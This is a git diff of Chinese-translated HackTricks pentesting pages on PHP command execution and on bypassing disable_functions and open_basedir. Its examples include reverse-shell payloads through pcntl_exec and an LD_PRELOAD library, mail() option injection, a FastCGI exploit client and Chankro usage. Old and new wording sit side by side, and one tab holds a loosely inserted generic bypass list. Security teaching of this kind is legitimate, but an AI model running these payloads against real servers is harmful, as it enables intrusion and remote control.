* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## PHP 命令 & 代码执行
## PHP 命令代码执行
### PHP 命令执行
**注意:** 如果其中一些函数被禁用,[p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php) php webshell可以**自动**检查并绕过以下函数。
**注意:** 一个 [p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php) php webshell 可以 **自动** 检查并绕过以下函数,如果其中一些被禁用
**exec** - 返回命令输出的最后一行
```bash
echo exec("uname -a");
```
**passthru** - 将命令输出直接传递到浏览器
**passthru** - 直接将命令输出传递给浏览器
```bash
echo passthru("uname -a");
```
@ -36,15 +37,15 @@ echo system("uname -a");
```bash
echo shell_exec("uname -a");
```
\`\`(反引号)- 与 shell\_exec() 相同
\`\` (反引号) - 与 shell\_exec() 相同
```bash
echo `uname -a`
```
**popen** - 打开一个读取或写入管道一个命令进程
**popen** - 打开到命令进程的读或写管道
```bash
echo fread(popen("/bin/ls /", "r"), 4096);
```
**proc\_open** - 类似于 popen(),但具有更高程度的控制
**proc\_open** - 类似于 popen() 但控制程度更高
```bash
proc_close(proc_open("uname -a",array(),$something));
```
@ -52,19 +53,19 @@ proc_close(proc_open("uname -a",array(),$something));
```php
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
```
**pcntl\_exec** - 执行一个程序(默认情况下在现代和不那么现代的PHP中您需要加载`pcntl.so`模块才能使用此函数)
**pcntl\_exec** - 执行一个程序(在现代和不太现代的 PHP 中,默认情况下您需要加载 `pcntl.so` 模块才能使用此函数)
```bash
pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]);
```
**mail / mb\_send\_mail** - 此函数用于发送邮件,但也可以被滥用以在`$options`参数中注入任意命令。这是因为**php `mail`函数**通常调用系统内的`sendmail`二进制文件,并允许您**添加额外选项**。但是您将无法看到执行命令的输出因此建议创建一个将输出写入文件的shell脚本使用mail执行它,并打印输出:
**mail / mb\_send\_mail** - 此函数用于发送邮件,但也可以被滥用以在 `$options` 参数中注入任意命令。这是因为 **php `mail` 函数** 通常在系统内部调用 `sendmail` 二进制文件,并允许您 **添加额外选项**。然而,您将无法看到执行命令的输出,因此建议创建一个将输出写入文件的 shell 脚本,通过邮件执行它,并打印输出:
```bash
file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777); mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt');
```
**dl** - 此函数可用于动态加载 PHP 扩展。这个函数并不总是存在,因此在尝试利用它之前,应该检查它是否可用。阅读[此页面以了解如何利用此函数](disable\_functions-bypass-dl-function.md)。
**dl** - 此函数可用于动态加载 PHP 扩展。函数并不总是存在,因此在尝试利用它之前,应该检查它是否可用。阅读[此页面以了解如何利用此函数](disable\_functions-bypass-dl-function.md)。
### PHP 代码执行
除了 eval,还有其他执行 PHP 代码的方法include/require 可用于以本地文件包含和远程文件包含漏洞的形式进行远程代码执行。
除了 eval还有其他方法可以执行 PHP 代码include/require 可用于以本地文件包含和远程文件包含漏洞的形式进行远程代码执行。
```php
${<php code>} // If your input gets reflected in any PHP string, it will be executed.
eval()
@ -86,10 +87,10 @@ $func->invokeArgs(array());
```
## disable\_functions & open\_basedir
**Disabled functions** 是可以在 PHP 的 `.ini` 文件中配置的设置,它将**禁止**使用指定的**函数**。**Open basedir** 是指示 PHP 可以访问的文件夹的设置。\
PHP 设置应配置在路径 _/etc/php7/conf.d_ 或类似位置。
**禁用函数**是可以在PHP的`.ini`文件中配置的设置,它将**禁止**使用指定的**函数**。**Open basedir**是指示PHP可以访问的文件夹的设置。\
PHP设置通常配置在路径 _/etc/php7/conf.d_ 或类似位置。
这两个配置可以在 **`phpinfo()`** 的输出中看到:
这两个配置可以在**`phpinfo()`**的输出中看到:
![](https://0xrick.github.io/images/hackthebox/kryptos/17.png)
@ -97,12 +98,12 @@ PHP 设置应配置在路径 _/etc/php7/conf.d_ 或类似位置。
## open\_basedir Bypass
`open_basedir` 将配置 PHP 可以访问的文件夹,您**将无法在**这些文件夹之外**写入/读取/执行任何文件**,但也**无法列出**其他目录。\
但是,如果您以某种方式能够执行任意 PHP 代码,您可以尝试以下一小段**代码**来尝试**绕过**限制。
`open_basedir`将配置PHP可以访问的文件夹你**将无法在**这些文件夹之外**读/写/执行任何文件**,而且你**甚至无法列出**其他目录。\
然而如果你能够执行任意PHP代码你可以**尝试**以下代码块来尝试**绕过**限制。
### 使用 glob:// 绕过列出目录
在这个第一个示例中,使用 `glob://` 协议和一些路径绕过
在这个第一个例子中,使用了带有某些路径绕过的`glob://`协议
```php
<?php
$file_list = array();
@ -119,21 +120,21 @@ foreach($file_list as $f){
echo "{$f}<br/>";
}
```
**注意1**:在路径中,您还可以使用`/e??/*`来列出`/etc/*`和任何其他文件夹。
**注意2**代码的一部分看起来是重复的,但实际上这是必要的!
**注意3**:此示例仅用于列出文件夹,而不是读取文件
**注意1**:在路径中,您还可以使用 `/e??/*` 来列出 `/etc/*` 和其他任何文件夹。\
**注意2**看起来代码的某部分是重复的,但这实际上是必要的!\
**注意3**:此示例仅用于列出文件夹,而不是读取文件
### 完整的 open_basedir 绕过,滥用 FastCGI
### 完全的 open\_basedir 绕过利用 FastCGI
如果您想**了解更多关于 PHP-FPM 和 FastCGI**的信息,可以阅读[此页面的第一部分](disable_functions-bypass-php-fpm-fastcgi.md)。
如果 **`php-fpm`** 已配置,您可以滥用它来完全绕过 **open_basedir**
如果您想**了解更多关于 PHP-FPM 和 FastCGI**的信息,可以阅读[本页的第一部分](disable\_functions-bypass-php-fpm-fastcgi.md)。\
如果**`php-fpm`**已配置,您可以利用它完全绕过**open\_basedir**
![](<../../../../.gitbook/assets/image (545).png>)
![](<../../../../.gitbook/assets/image (577).png>)
请注意,您需要做的第一件事是找到 **php-fpm 的 unix socket** 所在位置。它通常位于 `/var/run` 下,因此您可以**使用上面的代码列出目录并找到它**。
代码来自[这里](https://balsn.tw/ctf_writeup/20190323-0ctf_tctf2019quals/#wallbreaker-easy)。
请注意,您需要做的第一件事是找到**php-fpm 的 unix socket**在哪里。它通常位于 `/var/run` 下,因此您可以**使用之前的代码列出目录并找到它**。\
来自[这里](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy)的代码
```php
<?php
/**
@ -397,7 +398,6 @@ throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
*
* @param array $params Array of parameters
* @param String $stdin Content
```php
* @return String
*/
public function request(array $params, $stdin)
@ -485,44 +485,44 @@ $params = array(
echo $client->request($params, $code)."\n";
?>
```
些脚本将与**php-fpm的unix套接字**通信(通常位于/var/run如果使用fpm以执行任意代码。`open_basedir`设置将被发送的**PHP\_VALUE**属性覆盖。\
请注意`eval`如何用于执行您在**cmd**参数中发送的PHP代码。\
请注意**注释的第324行**,您可以取消注释它,**有效负载将自动连接到给定的URL并执行**其中包含的PHP代码。\
只需访问`http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');`即可获取`/etc/passwd`文件的内容。
个脚本将与 **php-fpm 的 unix socket**(通常位于 /var/run如果使用 fpm进行通信以执行任意代码。`open_basedir` 设置将被发送的 **PHP\_VALUE** 属性覆盖。\
注意 `eval` 是如何用来执行你在 **cmd** 参数中发送的 PHP 代码的。\
要注意 **注释掉的第 324 行**,你可以取消注释,它将使 **有效载荷自动连接到给定的 URL 并执行其中包含的 PHP 代码**。\
只需访问 `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` 即可获取 `/etc/passwd` 文件的内容。
{% hint style="warning" %}
您可能会认为,就像我们覆盖了`open_basedir`配置一样,我们可以**覆盖`disable_functions`**。好吧,尝试一下,但不会起作用,显然**`disable_functions`只能在`.ini` php**配置文件中配置您使用PHP\_VALUE进行的更改对此特定设置不会生效。
你可能会想,正如我们覆盖了 `open_basedir` 配置一样,我们也可以 **覆盖 `disable_functions`**。好吧,试试吧,但这不会有效,显然 **`disable_functions` 只能在 `.ini` php** 配置文件中进行配置,而你使用 PHP\_VALUE 进行的更改在这个特定设置上不会生效。
{% endhint %}
## disable\_functions绕过
## disable\_functions 绕过
如果您设法在机器内部执行PHP代码您可能希望进一步**执行任意系统命令**。在这种情况下,通常会发现大多数或所有允许**执行系统命令的PHP函数已在`disable_functions`中禁用**。\
因此,让我们看看您如何绕过此限制(如果可以)
如果你能够在机器上执行 PHP 代码,你可能想要更进一步,**执行任意系统命令**。在这种情况下,通常会发现大多数或所有允许 **执行系统命令的 PHP 函数都已被禁用****`disable_functions`** 中。\
那么,让我们看看你如何可以绕过这个限制(如果可以的话)。
### 自动绕过发现
您可以使用工具[https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser),它将指示您可以使用哪个函数(如果有)来**绕过`disable_functions`**。
你可以使用工具 [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser),它会指示你可以使用哪个函数(如果有的话)来 **绕过** **`disable_functions`**。
### 使用其他系统函数绕过
只需返回本页开头,**检查是否有任何未被禁用且在环境中可用的命令执行函数**。如果找到其中之一,您将能够使用它来执行任意系统命令。
只需返回到本页的开头,**检查是否有任何执行命令的函数未被禁用并在环境中可用**。如果你找到其中的一个,你将能够使用它来执行任意系统命令。
### LD\_PRELOAD绕过
### LD\_PRELOAD 绕过
众所周知PHP中的一些函数,如`mail()`,将**在系统内部执行二进制文件**。因此,您可以滥用它们,使用环境变量`LD_PRELOAD`来使它们加载一个可以执行任意操作的任意库。
众所周知PHP 中的一些函数如 `mail()` 将会 **在系统内执行二进制文件**。因此,你可以利用它们使用环境变量 `LD_PRELOAD` 来使它们加载一个可以执行任何操作的任意库。
#### 可用于使用LD\_PRELOAD绕过disable\_functions的函数
#### 可以用来通过 LD\_PRELOAD 绕过 disable\_functions 的函数
* **`mail`**
* **`mb_send_mail`**:在安装了`php-mbstring`模块时有效。
* **`imap_mail`**:如果存在`php-imap`模块则有效。
* **`libvirt_connect`**:需要`php-libvirt-php`模块。
* **`gnupg_init`**:在安装了`php-gnupg`模块时可用。
* **`new imagick()`**此类可被滥用以绕过限制。详细的利用技术可以在综合的[**这里的写作中找到**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/)。
* **`mb_send_mail`**:在安装了 `php-mbstring` 模块时有效。
* **`imap_mail`**:如果存在 `php-imap` 模块则有效。
* **`libvirt_connect`**:需要 `php-libvirt-php` 模块。
* **`gnupg_init`**:在安装了 `php-gnupg` 模块时可用。
* **`new imagick()`**这个类可以被滥用以绕过限制。详细的利用技术可以在一个全面的 [**写作中找到**](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/)。
您可以在[**这里找到**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py)用于查找这些函数的模糊测试脚本。
你可以在 [**这里找到**](https://github.com/tarunkant/fuzzphunc/blob/master/lazyFuzzer.py) 用于发现这些函数的模糊测试脚本。
这是一个您可以编译以滥用`LD_PRELOAD`环境变量的库:
这是一个你可以编译以滥用 `LD_PRELOAD` 环境变量的库:
```php
#include <unistd.h>
#include <sys/types.h>
@ -535,13 +535,13 @@ system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
return 1;
}
```
#### 使用 Chankro 绕过
#### 通过 Chankro 绕过
为了利用这个配置错误,您可以使用 [**Chankro**](https://github.com/TarlogicSecurity/Chankro)。这是一个工具,将会**生成一个 PHP 攻击**,您需要将其上传到易受攻击的服务器并执行它(通过 web 访问)。\
**Chankro** 将会在受害者的磁盘中写入您想要执行的**库和反向 shell**,并将使用\*\*`LD_PRELOAD` 技巧 + PHP `mail()`\*\* 函数来执行反向 shell。
为了利用这个错误配置,你可以使用 [**Chankro**](https://github.com/TarlogicSecurity/Chankro)。这是一个 **生成 PHP 漏洞利用代码** 的工具,你需要将其上传到易受攻击的服务器并执行(通过网页访问)。\
**Chankro** 将在受害者的磁盘上写入你想要执行的 **库和反向 shell**,并将使用 **`LD_PRELOAD` 技巧 + PHP `mail()`** 函数来执行反向 shell。
请注意,为了使用 **Chankro**`mail` 和 `putenv` **不能出现在 `disable_functions` 列表中**。\
下面的示例中,您可以看到如何为 **arch 64** 创建一个 chankro 攻击,它将执行 `whoami` 并将输出保存在 _/tmp/chankro\_shell.out_ 中chankro 将在 _/tmp_ 中**写入库和有效载荷**,最终的攻击将被命名为 **bicho.php**(这是您需要上传到受害者服务器的文件):
以下示例中,你可以看到如何为 **arch 64** **创建一个 chankro 漏洞利用代码**,它将执行 `whoami` 并将输出保存到 _/tmp/chankro\_shell.out_chankro 将 **在 _/tmp_ 中写入库和有效载荷**,最终的漏洞利用代码将被称为 **bicho.php**(这是你需要上传到受害者服务器的文件):
{% tabs %}
{% tab title="shell.sh" %}
@ -552,95 +552,66 @@ whoami > /tmp/chankro_shell.out
{% endtab %}
{% tab title="Chankro" %}
## PHP 有用的函数 - `disable_functions``open_basedir` 绕过
在 PHP 中,有一些有用的函数可以用于绕过 `disable_functions``open_basedir` 限制。这些函数可以帮助渗透测试人员在进行网络服务渗透测试时更好地执行任务。
### `disable_functions` 绕过
如果 PHP 的 `disable_functions` 配置禁用了一些函数,可以尝试使用以下方法绕过:
- 使用 `pcntl_exec` 函数
- 使用 `mail` 函数
- 使用 `putenv` 函数
- 使用 `proc_open` 函数
- 使用 `shell_exec` 函数
- 使用 `system` 函数
### `open_basedir` 绕过
`open_basedir` 限制了 PHP 脚本可以访问的目录。以下是一些绕过 `open_basedir` 的方法:
- 使用 `cURL` 函数
- 使用 `FTP` 函数
- 使用 `file_get_contents` 函数
- 使用 `readfile` 函数
- 使用 `copy` 函数
请注意,这些绕过方法可能会受到服务器配置和安全性措施的限制,因此在实际渗透测试中需要谨慎使用。
{% endtab %}
```bash
python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php
```
{% endtab %}
{% endtabs %}
如果发现**mail**函数被禁用,您仍然可以使用**mb\_send\_mail**函数。\
如果您发现 **mail** 函数被禁用函数阻止,您仍然可以使用 **mb\_send\_mail.**\
有关此技术和 Chankro 的更多信息,请访问:[https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/](https://www.tarlogic.com/en/blog/how-to-bypass-disable\_functions-and-open\_basedir/)
### 使用 PHP 功能进行“绕过”
### "绕过" 使用 PHP 功能
请注意,使用**PHP**您可以**读取和写入文件,创建目录并更改权限**。\
甚至可以**转储数据库**。\
也许使用**PHP**来**枚举**主机,您可以找到升级权限/执行命令的方法(例如读取某些私有 ssh 密钥)。
请注意,使用 **PHP** 您可以 **读取和写入文件,创建目录和更改权限**。\
您甚至可以 **转储数据库**。\
也许使用 **PHP****枚举** 该盒子,您可以找到提升权限/执行命令的方法(例如读取某些私有 ssh 密钥)。
我创建了一个 Webshell可以非常轻松地执行这些操作请注意大多数 Webshell 也会为您提供这些选项):[https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
我创建了一个 webshell使执行这些操作变得非常简单请注意大多数 webshell 也会为您提供这些选项):[https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
### 模块/版本相关的绕过
### 模块/版本依赖的绕过
如果正在使用某个特定模块或利用某个特定的 PHP 版本,有几种绕过**disable\_functions**的方法
如果使用某个特定模块或利用某个特定 PHP 版本,有几种方法可以绕过 disable\_functions
* [**FastCGI/PHP-FPMFastCGI 进程管理器)**](disable\_functions-bypass-php-fpm-fastcgi.md)
* [**使用启用的 FFI - Foreign Function Interface 进行绕过**](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/broken-reference/README.md)
* [**通过 mem 进行绕过**](disable\_functions-bypass-via-mem.md)
* [**FastCGI/PHP-FPM (FastCGI 进程管理器)**](disable\_functions-bypass-php-fpm-fastcgi.md)
* [**使用 FFI - 外部函数接口启用的绕过**](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/broken-reference/README.md)
* [**通过内存绕过**](disable\_functions-bypass-via-mem.md)
* [**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)
* [**PHP Perl 扩展 Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
* [**PHP Perl 扩展安全模式**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)
* [**dl 函数**](disable\_functions-bypass-dl-function.md)
* [**此漏洞**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)
* 5.\* - 可通过对 PoC 进行轻微更改来利用
* 7.0 - 至今的所有版本
* 7.1 - 至今的所有版本
* 7.2 - 至今的所有版本
* 7.3 - 至今的所有版本
* 7.4 - 至今的所有版本
* 8.0 - 至今的所有版本
* [**从 7.0 到 8.0 的漏洞利用(仅限 Unix**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)
* [**PHP 7.0=7.4\*nix**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)
* 5.\* - 通过对 PoC 进行小幅更改可利用
* 7.0 - 所有版本至今
* 7.1 - 所有版本至今
* 7.2 - 所有版本至今
* 7.3 - 所有版本至今
* 7.4 - 所有版本至今
* 8.0 - 所有版本至今
* [**从 7.0 到 8.0 的漏洞(仅限 Unix**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)
* [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)
* [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)
* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)
* [**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md)
* [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)
* [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)
* [**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)
* [**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)
* [**PHP 5.2 FOpen 漏洞**](disable\_functions-bypass-php-5.2-fopen-exploit.md)
* [**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)
### **自动工具**
### **自动工具**
以下脚本尝试了这里评论的一些方法:\
以下脚本尝试了一些这里提到的方法:\
[https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php](https://github.com/l3m0n/Bypass\_Disable\_functions\_Shell/blob/master/shell.php)
## 其他有趣的 PHP 函数
### 接受回调的函数列表
这些函数接受一个字符串参数,该参数可用于调用攻击者选择的函数。根据函数,攻击者可能有或没有传递参数的能力。在这种情况下,可以使用信息泄露函数,如 phpinfo()。
这些函数接受一个字符串参数,可以用来调用攻击者选择的函数。根据函数的不同,攻击者可能有或没有能力传递参数。在这种情况下,可以使用信息泄露函数,如 phpinfo()。
[回调 / 可调用函数](https://www.php.net/manual/en/language.types.callable.php)
[回调 / 可调用](https://www.php.net/manual/en/language.types.callable.php)
[以下列表来自这里](https://stackoverflow.com/questions/3115559/exploitable-php-functions)
[从这里开始的后续列表](https://stackoverflow.com/questions/3115559/exploitable-php-functions)
```php
// Function => Position of callback arguments
'ob_start' => 0,
@ -678,7 +649,7 @@ python2 chankro.py --arch 64 --input shell.sh --path /tmp --output bicho.php
```
### 信息泄露
大多数这些函数调用不是漏洞点。但如果返回的任何数据对攻击者可见,这可能是一个漏洞。如果攻击者可以看到 phpinfo()那肯定是一个漏洞。
大多数这些函数调用不是数据汇聚点。但如果返回的任何数据对攻击者可见,这可能是一个漏洞。如果攻击者可以看到 phpinfo()这绝对是一个漏洞。
```php
phpinfo
posix_mkfifo
@ -720,7 +691,9 @@ posix_setuid
```
### 文件系统函数
根据 RATSphp 中的所有文件系统函数都很危险。其中一些对攻击者似乎并不是很有用。而另一些比你想象的更有用。例如,如果 allow\_url\_fopen=On则可以将 url 用作文件路径,因此调用 copy($\_GET\['s'], $\_GET\['d']); 可以用于在系统的任何位置上传 PHP 脚本。此外,如果网站容易受到通过 GET 发送的请求的影响,则这些文件系统函数中的每一个都可以被滥用,以通过您的服务器将攻击通道到另一台主机。
根据 RATSphp 中的所有文件系统函数都很糟糕。其中一些对攻击者似乎并不太有用。其他的则比你想象的更有用。例如,如果 allow\_url\_fopen=On则可以将 URL 用作文件路径,因此调用 copy($\_GET\['s'], $\_GET\['d']); 可以用来在系统上的任何地方上传 PHP 脚本。此外,如果一个站点容易受到通过 GET 发送的请求的攻击,那么所有这些文件系统函数都可以被滥用,以通过你的服务器将攻击引导到另一个主机。
**打开文件系统处理程序**
```php
fopen
tmpfile
@ -815,16 +788,17 @@ sha1_file
php_strip_whitespace
get_meta_tags
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

96
network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
View file

@ -1,66 +1,70 @@
# disable_functions绕过 - php-fpm/FastCGI
# disable\_functions bypass - php-fpm/FastCGI
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## PHP-FPM
**PHP-FPM**被认为是标准PHP FastCGI的**优秀替代方案**,提供了对于**高流量网站特别有益的功能**。它通过一个监控一组工作进程的主进程运行。对于PHP脚本请求是Web服务器启动**FastCGI代理连接到PHP-FPM服务**。该服务有能力**通过服务器上的网络端口或Unix套接字接收请求**
**PHP-FPM** 被视为标准 PHP FastCGI 的 **优越替代品**,提供了对 **高流量网站特别有利的功能**。它通过一个主进程来管理一组工作进程。对于 PHP 脚本请求web 服务器会发起一个 **FastCGI 代理连接到 PHP-FPM 服务**。该服务能够 **通过服务器上的网络端口或 Unix 套接字接收请求**
尽管代理连接起到中间人的作用但PHP-FPM需要在与Web服务器相同的机器上运行。它使用的连接虽然基于代理但与传统的代理连接不同。在接收请求后PHP-FPM中的可用工作进程处理请求——执行PHP脚本然后将结果转发回Web服务器。工作进程处理完请求后会再次变为可用状态以处理即将到来的请求。
尽管代理连接起到了中介作用PHP-FPM 仍需在与 web 服务器相同的机器上运行。它所使用的连接虽然是基于代理的但与传统的代理连接有所不同。在接收到请求后PHP-FPM 中的一个可用工作进程会处理该请求——执行 PHP 脚本,然后将结果转发回 web 服务器。工作进程在处理完请求后,会再次可用于即将到来的请求。
## 但是CGI和FastCGI是什么?
## 但 CGI 和 FastCGI 是什么?
### CGI
通常,从Web服务器传输到浏览器的网页、文件和所有文档都存储在特定的公共目录中例如home/user/public_html。**当浏览器请求特定内容时,服务器会检查该目录并将所需文件发送给浏览器**。
通常,网页、文件和所有从 web 服务器传输到浏览器的文档都存储在特定的公共目录中,例如 home/user/public\_html。**当浏览器请求某些内容时,服务器会检查该目录并将所需文件发送给浏览器**。
如果服务器上安装了**CGI**则还会在那里添加特定的cgi-bin目录例如home/user/public_html/cgi-bin。CGI脚本存储在此目录中。**目录中的每个文件都被视为可执行程序**。访问目录中的脚本时,服务器会将请求发送到负责该脚本的应用程序,而不是将文件内容发送到浏览器。**在输入数据处理完成后,应用程序将输出数据发送**给Web服务器然后Web服务器将数据转发给HTTP客户端。
如果 **CGI** 安装在服务器上,特定的 cgi-bin 目录也会被添加,例如 home/user/public\_html/cgi-bin。CGI 脚本存储在该目录中。**目录中的每个文件都被视为可执行程序**。当访问该目录中的脚本时,服务器会向负责该脚本的应用程序发送请求,而不是将文件内容发送给浏览器。**在输入数据处理完成后,应用程序将输出数据** 发送到 web 服务器,后者将数据转发给 HTTP 客户端。
例如,当访问CGI脚本[http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/\*\*cgi-bin/file.pl\*\*)时服务器将通过CGI运行适当的Perl应用程序。脚本执行生成的数据将由应用程序发送到Web服务器。另一方面服务器将数据传输给浏览器。如果服务器没有安装CGI浏览器将显示**.pl**文件代码本身。(解释来自[这里](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)
例如,当访问 CGI 脚本 [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/\*\*cgi-bin/file.pl\*\*) 时,服务器将通过 CGI 运行相应的 Perl 应用程序。脚本执行生成的数据将由应用程序发送到 web 服务器。服务器则会将数据传输给浏览器。如果服务器没有 CGI浏览器将显示 **.pl** 文件的代码本身。(解释来自 [这里](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)
### FastCGI
